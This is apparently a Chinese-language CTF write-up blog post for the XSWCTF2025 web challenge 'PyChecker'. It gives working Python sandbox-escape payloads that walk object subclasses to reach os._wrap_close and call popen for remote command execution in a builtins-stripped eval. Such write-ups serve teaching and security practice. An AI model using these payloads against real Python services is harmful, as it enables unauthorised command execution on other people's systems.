南极特种部队

南极特种部队

Never really desperate, only the lost of the soul.

PyChecker

XSWCTF2025

Web

发布日期: 2025-11-17

Web - PyChecker Writeup

分析附件

ns = {'__builtins__': {}} 禁用了所有的内置函数
用eval执行但是所有内置函数被step over

沙箱逃逸

加载子类把子类列表转字符串作为错误信息打印

1 2	def dump(_ = {}['{}'.format((0).__class__.__base__.__subclasses__())]): pass

子类列表

从子类列表找os.wrap_close的位次 index=166
加载os.wrap_close 调用popen 实现RCE

1 2	def rce(_ = {}[(0).__class__.__base__.__subclasses__()[166].__init__.__globals__['popen']('ls /').read()]): pass

最终在/home/ctf找到flag
Flag

感谢出题人审阅辛苦了

菜叶片

https://叶片.xyz/2025/11/17/PyChecker/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源菜叶片 !

XSWCTF2025

上一篇

ez_unser

Web - ez_unser Writeup

2025-11-17 Web

XSWCTF2025

下一篇

secret

Web - secret Writeup

2025-11-17 Web

XSWCTF2025